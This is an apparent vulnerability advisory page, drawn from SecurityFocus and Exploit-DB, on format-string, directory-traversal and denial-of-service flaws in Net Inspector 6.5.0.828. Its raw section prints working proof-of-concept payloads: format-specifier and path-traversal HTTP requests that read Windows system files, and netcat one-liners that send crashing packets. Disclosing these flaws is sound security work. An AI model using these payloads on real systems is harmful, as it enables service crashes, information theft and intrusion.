Net Inspector Multiple Remote Vulnerabilities

vendor:

Net Inspector

by:

SecurityFocus

7.5

CVSS

HIGH

Format-String, Directory-Traversal, Denial-of-Service

119, 22, 20

CWE

Product Name: Net Inspector

Affected Version From: 6.5.0.828

Affected Version To: 6.5.0.828

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Net Inspector Multiple Remote Vulnerabilities

Net Inspector is prone to multiple remote vulnerabilities, including a format-string vulnerability, a directory-traversal vulnerability, and multiple denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code within the context of the affected application, obtain sensitive information, or crash the affected application.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28266/info

Net Inspector is prone to multiple remote vulnerabilities, including:

- A format-string vulnerability
- A directory-traversal vulnerability
- Multiple denial-of-service vulnerabilities

An attacker can exploit these issues to execute arbitrary code within the context of the affected application, obtain sensitive information, or crash the affected application.

These issues affect Net Inspector 6.5.0.828; other versions may also be affected. 

GET /%n%n%s%s%n%n%n%s HTTP/1.0

GET ../../../../boot.ini HTTP/1.0

GET \../..\../..\windows/win.ini HTTP/1.0

cho|nc SERVER PORT -v -v -u

echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1